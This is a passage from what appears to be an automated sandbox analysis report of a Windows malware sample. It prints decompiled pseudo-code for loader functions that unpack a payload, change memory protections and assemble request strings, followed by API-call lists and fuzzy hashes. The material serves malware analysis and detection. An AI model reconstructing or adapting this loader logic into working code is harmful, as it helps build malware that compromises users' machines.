                								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
                								if(_t82 != 0) {
                									_v32 = _v32 & 0x00000000;
                									_t89 = _v16;
                									_v12 = 0x400;
                									do {
                										_t93 =  *((intOrPtr*)(_v8 + _t89));
                										_v40 = _t93;
                										if(_t93 == 0) {
                											_v12 = 1;
                										} else {
                											 *_t89 = _t93 + _v32 - _t82;
                											_v32 = _v40;
                											_t89 = _t89 + 4;
                										}
                										_t33 =  &_v12;
                										 *_t33 = _v12 - 1;
                									} while ( *_t33 != 0);
                								}
                								_t69 = _v44;
                								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
                								_v16 = _v16 + 0x1000;
                								 *0x6e244140 = _t77;
                							} while (_t69 < _t67);
                						}
                						if(_t77 != 0x63699bc3) {
                							_v24 = 0xc;
                						} else {
                							memcpy(_v48, _v36, _v20);
                						}
                						VirtualFree(_v36, 0, 0x8000); // executed
                					}
                				}
                				return _v24;
                			}































                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E24113E
                • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E241204
                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E24121F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: Virtual$AllocFreememcpy
                • String ID: May 5 2021
                • API String ID: 4010158826-1965333733
                • Opcode ID: bdfebce2ff658fba81f935d2ca0e9133bd7fe05cb95b8219e89fdde37f94ba95
                • Instruction ID: 0b76baa9a1d62a72a5e01c1788d979bbcfe1b4f9f9b981fa1a0e38ed5ebffe59
                • Opcode Fuzzy Hash: bdfebce2ff658fba81f935d2ca0e9133bd7fe05cb95b8219e89fdde37f94ba95
                • Instruction Fuzzy Hash: 35414AB1E0021EDFDB09CFD9C884ADEBBB6BF45314F188129D904BB244C774AA59CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 001D90DA
                • SysAllocString.OLEAUT32(001D4010), ref: 001D911E
                • SysFreeString.OLEAUT32(00000000), ref: 001D9132
                • SysFreeString.OLEAUT32(00000000), ref: 001D9140
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 68ff543be5ee95a035eb84b1ae19220d3b12b45dffc98037f421b4a95ba45d58
                • Instruction ID: 2fa4b1a499fbe7d9e75a45eb25b6de515db043e8d6019845da1dc02ba030a32f
                • Opcode Fuzzy Hash: 68ff543be5ee95a035eb84b1ae19220d3b12b45dffc98037f421b4a95ba45d58
                • Instruction Fuzzy Hash: C631F87690120AEFCB05DF98D8C48AE7BB9FF58350F20842BF9069B250D7319A81CF61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E001D6BC0(char* __eax) {
                				char* _t8;
                				intOrPtr _t12;
                				char* _t21;
                				signed int _t23;
                				char* _t24;
                				signed int _t26;
                				void* _t27;
                
                				_t21 = __eax;
                				_push(0x20);
                				_t23 = 1;
                				_push(__eax);
                				while(1) {
                					_t8 = StrChrA();
                					if(_t8 == 0) {
                						break;
                					}
                					_t23 = _t23 + 1;
                					_push(0x20);
                					_push( &(_t8[1]));
                				}
                				_t12 = E001D7E20(_t23 << 2);
                				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                				if(_t12 != 0) {
                					StrTrimA(_t21, 0x1dc2a4); // executed
                					_t26 = 0;
                					do {
                						_t24 = StrChrA(_t21, 0x20);
                						if(_t24 != 0) {
                							 *_t24 = 0;
                							_t24 =  &(_t24[1]);
                							StrTrimA(_t24, 0x1dc2a4);
                						}
                						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                						_t26 = _t26 + 1;
                						_t21 = _t24;
                					} while (_t24 != 0);
                					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                				}
                				return 0;
                			}

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,02FA95AC,?,001D5D85,?,001D8097,02FA95AC,?,001D5D85), ref: 001D6BDA
                • StrTrimA.KERNELBASE(?,001DC2A4,00000002,?,001D5D85,?,001D8097,02FA95AC,?,001D5D85), ref: 001D6BF9
                • StrChrA.SHLWAPI(?,00000020,?,001D5D85,?,001D8097,02FA95AC,?,001D5D85), ref: 001D6C04
                • StrTrimA.SHLWAPI(00000001,001DC2A4,?,001D5D85,?,001D8097,02FA95AC,?,001D5D85), ref: 001D6C16
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: a070ce36ac91a94c1485cb80a0b8217fb2974cb020dacc47f5dc6326a739c4ef
                • Instruction ID: 4fe9a2e98effe206f43bc85f82a129bdb758a4719413580be6d266d47834e19e
                • Opcode Fuzzy Hash: a070ce36ac91a94c1485cb80a0b8217fb2974cb020dacc47f5dc6326a739c4ef
                • Instruction Fuzzy Hash: 760175717063365FD3219F59DC49F27BB98EB95BA4F11051AF881C7340DB65CC0186A5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E6E24173D(void* __ecx, char _a4) {
                				long _t3;
                				int _t4;
                				int _t9;
                				void* _t13;
                
                				_t13 = GetCurrentThread();
                				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                				if(_t3 != 0) {
                					SetThreadPriority(_t13, 0xffffffff); // executed
                				}
                				_t4 = E6E241237(_a4); // executed
                				_t9 = _t4;
                				if(_t9 == 0) {
                					SetThreadPriority(_t13, _t4);
                				}
                				asm("lock xadd [eax], ecx");
                				return _t9;
                			}

                APIs
                • GetCurrentThread.KERNEL32 ref: 6E241740
                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E24174B
                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E24175E
                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E241771
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: Thread$Priority$AffinityCurrentMask
                • String ID:
                • API String ID: 1452675757-0
                • Opcode ID: 6f9d3aed27e600e81e865040d1a2594262be4b360a273502c29b95497fef6e26
                • Instruction ID: 0a9c71bdad333aa6784129af115eecc473885de7ef0429ec622e5bda580d9050
                • Opcode Fuzzy Hash: 6f9d3aed27e600e81e865040d1a2594262be4b360a273502c29b95497fef6e26
                • Instruction Fuzzy Hash: ABE09B35306A15DBA6067A79CC8CE6B775EEF86371B014336F520D21D0CBD08D16C5B5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetConsoleOutputCP.KERNELBASE(000004E3,6E2B35D0,?,?,?,?), ref: 6E27FBC6
                • SetConsoleCP.KERNELBASE(000004E3,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6E281971), ref: 6E27FC8D
                • GetCurrentDirectoryW.KERNEL32(00000869,6E2CA9E0,?), ref: 6E27FD2E
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: Console$CurrentDirectoryOutput
                • String ID:
                • API String ID: 487666016-0
                • Opcode ID: 99975087a13e0351b92859332c4ee97f42ed497cb8a428656f95825412ce88dc
                • Instruction ID: efb2811a50fa0f44f337d6bfd6a6f2c99a20e1b80aa8b33d974e47c1bd2a2a14
                • Opcode Fuzzy Hash: 99975087a13e0351b92859332c4ee97f42ed497cb8a428656f95825412ce88dc
                • Instruction Fuzzy Hash: ED91D171E04A058FDF64CF7CC98C6567BA3BF86308F104A29EA4987389D6F0A945CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D579B(void* __edx) {
                				void* _v8;
                				int _v12;
                				WCHAR* _v16;
                				void* __edi;
                				void* __esi;
                				void* _t23;
                				intOrPtr _t24;
                				void* _t26;
                				intOrPtr _t32;
                				intOrPtr _t35;
                				intOrPtr _t38;
                				intOrPtr _t42;
                				void* _t45;
                				void* _t50;
                				void* _t52;
                
                				_t50 = __edx;
                				_v12 = 0;
                				_t23 = E001DA762(0,  &_v8); // executed
                				if(_t23 != 0) {
                					_v8 = 0;
                				}
                				_t24 =  *0x1dd2a4; // 0x2dca5a8
                				_t4 = _t24 + 0x1dede0; // 0x2fa9388
                				_t5 = _t24 + 0x1ded88; // 0x4f0053
                				_t26 = E001D4B9D( &_v16, _v8, _t5, _t4); // executed
                				_t45 = _t26;
                				if(_t45 == 0) {
                					StrToIntExW(_v16, 0,  &_v12);
                					_t45 = 8;
                					if(_v12 < _t45) {
                						_t45 = 1;
                						__eflags = 1;
                					} else {
                						_t32 =  *0x1dd2a4; // 0x2dca5a8
                						_t11 = _t32 + 0x1dedd4; // 0x2fa937c
                						_t48 = _t11;
                						_t12 = _t32 + 0x1ded88; // 0x4f0053
                						_t52 = E001D8FE0(_t11, _t12, _t11);
                						_t59 = _t52;
                						if(_t52 != 0) {
                							_t35 =  *0x1dd2a4; // 0x2dca5a8
                							_t13 = _t35 + 0x1dee1e; // 0x30314549
                							if(E001D450C(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                								_t61 =  *0x1dd25c - 6;
                								if( *0x1dd25c <= 6) {
                									_t42 =  *0x1dd2a4; // 0x2dca5a8
                									_t15 = _t42 + 0x1dec2a; // 0x52384549
                									E001D450C(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                								}
                							}
                							_t38 =  *0x1dd2a4; // 0x2dca5a8
                							_t17 = _t38 + 0x1dee18; // 0x2fa93c0
                							_t18 = _t38 + 0x1dedf0; // 0x680043
                							_t45 = E001D27A2(_v8, 0x80000001, _t52, _t18, _t17);
                							HeapFree( *0x1dd238, 0, _t52);
                						}
                					}
                					HeapFree( *0x1dd238, 0, _v16);
                				}
                				_t54 = _v8;
                				if(_v8 != 0) {
                					E001D8371(_t54);
                				}
                				return _t45;
                			}

                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02FA9388,00000000,?,74B5F710,00000000,74B5F730), ref: 001D57EA
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02FA93C0,?,00000000,30314549,00000014,004F0053,02FA937C), ref: 001D5887
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001D8522), ref: 001D5899
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 9c7b31553a10d77b960f57770f9850c746e1bb556473d7d2d17cc8c1095ebb9a
                • Instruction ID: fc924e0838e79f39f4cff222cbf658ff9037bda7bb0a3a99f8accdba4527dd36
                • Opcode Fuzzy Hash: 9c7b31553a10d77b960f57770f9850c746e1bb556473d7d2d17cc8c1095ebb9a
                • Instruction Fuzzy Hash: 62318F32901519BFDB11EBD1EC84EAA7BBEEF54700F2400A7B505AB2A1D770DE45DB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E001D8A1D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				void* _v8;
                				void* __edi;
                				intOrPtr _t18;
                				void* _t24;
                				void* _t30;
                				void* _t36;
                				void* _t40;
                				intOrPtr _t42;
                
                				_t36 = __edx;
                				_t32 = __ecx;
                				_push(__ecx);
                				_push(__ecx);
                				_t42 =  *0x1dd340; // 0x2fa9928
                				_push(0x800);
                				_push(0);
                				_push( *0x1dd238);
                				if( *0x1dd24c >= 5) {
                					if(RtlAllocateHeap() == 0) {
                						L6:
                						_t30 = 8;
                						L7:
                						if(_t30 != 0) {
                							L10:
                							 *0x1dd24c =  *0x1dd24c + 1;
                							L11:
                							return _t30;
                						}
                						_t44 = _a4;
                						_t40 = _v8;
                						 *_a16 = _a4;
                						 *_a20 = E001D46F9(_t44, _t40);
                						_t18 = E001D4245(_t40, _t44);
                						if(_t18 != 0) {
                							 *_a8 = _t40;
                							 *_a12 = _t18;
                							if( *0x1dd24c < 5) {
                								 *0x1dd24c =  *0x1dd24c & 0x00000000;
                							}
                							goto L11;
                						}
                						_t30 = 0xbf;
                						E001D45F1();
                						HeapFree( *0x1dd238, 0, _t40);
                						goto L10;
                					}
                					_t24 = E001D2941(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                					L5:
                					_t30 = _t24;
                					goto L7;
                				}
                				if(RtlAllocateHeap() == 0) {
                					goto L6;
                				}
                				_t24 = E001D24B4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
                				goto L5;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 001D8A41
                  • Part of subcall function 001D24B4: GetTickCount.KERNEL32 ref: 001D24C8
                  • Part of subcall function 001D24B4: wsprintfA.USER32 ref: 001D2518
                  • Part of subcall function 001D24B4: wsprintfA.USER32 ref: 001D2535
                  • Part of subcall function 001D24B4: wsprintfA.USER32 ref: 001D2561
                  • Part of subcall function 001D24B4: HeapFree.KERNEL32(00000000,?), ref: 001D2573
                  • Part of subcall function 001D24B4: wsprintfA.USER32 ref: 001D2594
                  • Part of subcall function 001D24B4: HeapFree.KERNEL32(00000000,?), ref: 001D25A4
                  • Part of subcall function 001D24B4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001D25D2
                  • Part of subcall function 001D24B4: GetTickCount.KERNEL32 ref: 001D25E3
                • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 001D8A5F
                • HeapFree.KERNEL32(00000000,00000002,001D856D,?,001D856D,00000002,?,?,001D5DBE,?), ref: 001D8ABC
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Heap$wsprintf$AllocateFree$CountTick
                • String ID:
                • API String ID: 1676223858-0
                • Opcode ID: 494c3fcfac4b6cabe12f905317695ad8fd26db536654c8a2c8554ffb5660db77
                • Instruction ID: 01d26b2211c1fda837d3eef459bd2b8e5f23272b0957a44414b36b098bc80d7d
                • Opcode Fuzzy Hash: 494c3fcfac4b6cabe12f905317695ad8fd26db536654c8a2c8554ffb5660db77
                • Instruction Fuzzy Hash: D1212C76202215EBCB119F99EC44AAA37BCEB58344F144127F902DB251DB70ED85DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E6E241E32(void* __eax, void* _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				long _v20;
                				int _t43;
                				long _t54;
                				signed int _t57;
                				void* _t58;
                				signed int _t60;
                
                				_v12 = _v12 & 0x00000000;
                				_t57 =  *0x6e244140;
                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                				_v16 =  *(__eax + 6) & 0x0000ffff;
                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                				_v8 = _v8 & 0x00000000;
                				if(_v16 <= 0) {
                					L12:
                					return _v12;
                				} else {
                					goto L1;
                				}
                				while(1) {
                					L1:
                					_t60 = _v12;
                					if(_t60 != 0) {
                						goto L12;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t60 >= 0) {
                						asm("bt [esi+0x24], eax");
                						if(__eflags >= 0) {
                							L8:
                							_t54 = _t57 - 0x63699bbf;
                							L9:
                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                							if(_t43 == 0) {
                								_v12 = GetLastError();
                							}
                							_v8 = _v8 + 1;
                							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                							if(_v8 < _v16) {
                								continue;
                							} else {
                								goto L12;
                							}
                						}
                						asm("bt [esi+0x24], eax");
                						_t54 = _t57 - 0x63699bc1;
                						if(__eflags >= 0) {
                							goto L9;
                						}
                						goto L8;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t60 >= 0) {
                						_t54 = _t57 - 0x63699ba3;
                					} else {
                						_t54 = _t57 - 0x63699b83;
                					}
                					goto L9;
                				}
                				goto L12;
                			}

                APIs
                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E241E6B
                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E241EE0
                • GetLastError.KERNEL32 ref: 6E241EE6
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: ProtectVirtual$ErrorLast
                • String ID:
                • API String ID: 1469625949-0
                • Opcode ID: a40fc3e79eca7307466b4bccd1715c878618ef6f9aa547809a2c140ddd36ea04
                • Instruction ID: fff6fe07eeada4d96e0de1d717685f1c788836afc29f943c46734efcb10db9ab
                • Opcode Fuzzy Hash: a40fc3e79eca7307466b4bccd1715c878618ef6f9aa547809a2c140ddd36ea04
                • Instruction Fuzzy Hash: C6217136D0020BDFDB19DF95C885EAAF7F6FF04319F004859D10697485E3B8A6A9CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E001D620F(void* __eflags, int _a4) {
                				intOrPtr _v12;
                				WCHAR* _v16;
                				char* _v20;
                				int _v24;
                				void* _v36;
                				char _v40;
                				char _v68;
                				char _v72;
                				char _v76;
                				char _v80;
                				void _v84;
                				char _v88;
                				void* __esi;
                				intOrPtr _t40;
                				int _t45;
                				intOrPtr _t50;
                				intOrPtr _t52;
                				intOrPtr _t67;
                				void* _t80;
                				WCHAR* _t85;
                
                				_v88 = 0;
                				memset( &_v84, 0, 0x2c);
                				_v40 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_t40 =  *0x1dd2a4; // 0x2dca5a8
                				_t5 = _t40 + 0x1dee40; // 0x410025
                				_t85 = E001D662A(_t5);
                				_v16 = _t85;
                				if(_t85 == 0) {
                					_t80 = 8;
                					L24:
                					return _t80;
                				}
                				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                				if(_t45 != 0) {
                					_t80 = 1;
                					L22:
                					E001DA5FA(_v16);
                					goto L24;
                				}
                				if(E001DA762(0,  &_a4) != 0) {
                					_a4 = 0;
                				}
                				_t50 = E001D1546(0,  *0x1dd33c);
                				_v12 = _t50;
                				if(_t50 == 0) {
                					_t80 = 8;
                					goto L19;
                				} else {
                					_t52 =  *0x1dd2a4; // 0x2dca5a8
                					_t11 = _t52 + 0x1de81a; // 0x65696c43
                					_t87 = E001D1546(0, _t11);
                					if(_t55 == 0) {
                						_t80 = 8;
                					} else {
                						_t80 = E001D5AF6(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                						E001DA5FA(_t87);
                					}
                					if(_t80 != 0) {
                						L17:
                						E001DA5FA(_v12);
                						L19:
                						_t86 = _a4;
                						if(_a4 != 0) {
                							E001D8371(_t86);
                						}
                						goto L22;
                					} else {
                						if(( *0x1dd260 & 0x00000001) == 0) {
                							L14:
                							E001D43DF(_v84, _v88,  *0x1dd270, 0);
                							_t80 = E001D8B3E(_v88,  &_v80,  &_v76, 0);
                							if(_t80 == 0) {
                								_v24 = _a4;
                								_v20 =  &_v88;
                								_t80 = E001D8C8E( &_v40, 0);
                							}
                							E001DA5FA(_v88);
                							goto L17;
                						}
                						_t67 =  *0x1dd2a4; // 0x2dca5a8
                						_t18 = _t67 + 0x1de823; // 0x65696c43
                						_t89 = E001D1546(0, _t18);
                						if(_t70 == 0) {
                							_t80 = 8;
                						} else {
                							_t80 = E001D5AF6(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                							E001DA5FA(_t89);
                						}
                						if(_t80 != 0) {
                							goto L17;
                						} else {
                							goto L14;
                						}
                					}
                				}
                			}

                APIs
                • memset.NTDLL ref: 001D6224
                  • Part of subcall function 001D662A: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,001D624A,00410025,00000005,?,00000000), ref: 001D663B
                  • Part of subcall function 001D662A: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 001D6658
                • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 001D6258
                • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 001D6263
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: EnvironmentExpandStrings$lstrlenmemset
                • String ID:
                • API String ID: 3817122888-0
                • Opcode ID: f0bb634d0350fff3cfbdbc5a0d1036c1e86a3dc74ed5a2fa5e7a4d570accd008
                • Instruction ID: 99f968c6780fdcb3c70254e85dda04b24f2b132caa95fc23a8023833a1d8ddb4
                • Opcode Fuzzy Hash: f0bb634d0350fff3cfbdbc5a0d1036c1e86a3dc74ed5a2fa5e7a4d570accd008
                • Instruction Fuzzy Hash: C8412A72A01219BBDB11EFE4DC85AEE7BBCBF18340B104427FA05AB211D775DE458B91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E001D59F9(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                				void* _v8;
                				void* __esi;
                				intOrPtr* _t35;
                				void* _t40;
                				intOrPtr* _t41;
                				intOrPtr* _t43;
                				intOrPtr* _t45;
                				intOrPtr* _t50;
                				intOrPtr* _t52;
                				void* _t54;
                				intOrPtr* _t55;
                				intOrPtr* _t57;
                				intOrPtr* _t61;
                				intOrPtr* _t65;
                				intOrPtr _t68;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                
                				_t55 = _a4;
                				_t35 =  *((intOrPtr*)(_t55 + 4));
                				_a4 = 0;
                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                				if(_t76 < 0) {
                					L18:
                					return _t76;
                				}
                				_t40 = E001D907D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                				_t76 = _t40;
                				if(_t76 >= 0) {
                					_t61 = _a28;
                					if(_t61 != 0 &&  *_t61 != 0) {
                						_t52 = _v8;
                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                					}
                					if(_t76 >= 0) {
                						_t43 =  *_t55;
                						_t68 =  *0x1dd2a4; // 0x2dca5a8
                						_t20 = _t68 + 0x1de1fc; // 0x740053
                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                						if(_t76 >= 0) {
                							_t76 = E001D666E(_a4);
                							if(_t76 >= 0) {
                								_t65 = _a28;
                								if(_t65 != 0 &&  *_t65 == 0) {
                									_t50 = _a4;
                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                								}
                							}
                						}
                						_t45 = _a4;
                						if(_t45 != 0) {
                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                						}
                						_t57 = __imp__#6;
                						if(_a20 != 0) {
                							 *_t57(_a20);
                						}
                						if(_a12 != 0) {
                							 *_t57(_a12);
                						}
                					}
                				}
                				_t41 = _v8;
                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                				goto L18;
                			}

                APIs
                  • Part of subcall function 001D907D: SysAllocString.OLEAUT32(80000002), ref: 001D90DA
                  • Part of subcall function 001D907D: SysFreeString.OLEAUT32(00000000), ref: 001D9140
                • SysFreeString.OLEAUT32(?), ref: 001D5AD8
                • SysFreeString.OLEAUT32(001D4010), ref: 001D5AE2
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: 0ae61056e9c33d8bbbe6e1b21e5940c7113e95a926b6e09f7719b63a9c304195
                • Instruction ID: c3c73649bebdb82efa134f104dc8923966405775cc960eb5e0bb0cf092c03a06
                • Opcode Fuzzy Hash: 0ae61056e9c33d8bbbe6e1b21e5940c7113e95a926b6e09f7719b63a9c304195
                • Instruction Fuzzy Hash: B2313976600529AFCB11DF98C888C9BBB7AFFC9740714465AF8159B210E731DD91DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6E241424() {
                				char _v16;
                				intOrPtr _v28;
                				void _v32;
                				void* _v36;
                				intOrPtr _t15;
                				void* _t16;
                				long _t25;
                				int _t26;
                				void* _t30;
                				intOrPtr* _t32;
                				signed int _t36;
                				intOrPtr _t39;
                
                				_t15 =  *0x6e244144;
                				if( *0x6e24412c > 5) {
                					_t16 = _t15 + 0x6e2450f9;
                				} else {
                					_t16 = _t15 + 0x6e2450b1;
                				}
                				E6E2410BC(_t16, _t16);
                				_t36 = 6;
                				memset( &_v32, 0, _t36 << 2);
                				if(E6E241A26( &_v32,  &_v16,  *0x6e244140 ^ 0xfd7cd1cf) == 0) {
                					_t25 = 0xb;
                				} else {
                					_t26 = lstrlenW( *0x6e244138);
                					_t8 = _t26 + 2; // 0x2
                					_t11 = _t26 + _t8 + 8; // 0xa
                					_t30 = E6E241352(_t39, _t11,  &_v32,  &_v36); // executed
                					if(_t30 == 0) {
                						_t32 = _v36;
                						 *_t32 = 0;
                						if( *0x6e244138 == 0) {
                							 *((short*)(_t32 + 4)) = 0;
                						} else {
                							E6E242032(_t44, _t32 + 4);
                						}
                					}
                					_t25 = E6E241699(_v28); // executed
                				}
                				ExitThread(_t25);
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: ExitThreadlstrlen
                • String ID:
                • API String ID: 2636182767-0
                • Opcode ID: b3f3c9c7fa74f62a993e4ee658d76b7bd8eaea101f56c02d2ae2e011aaec50cf
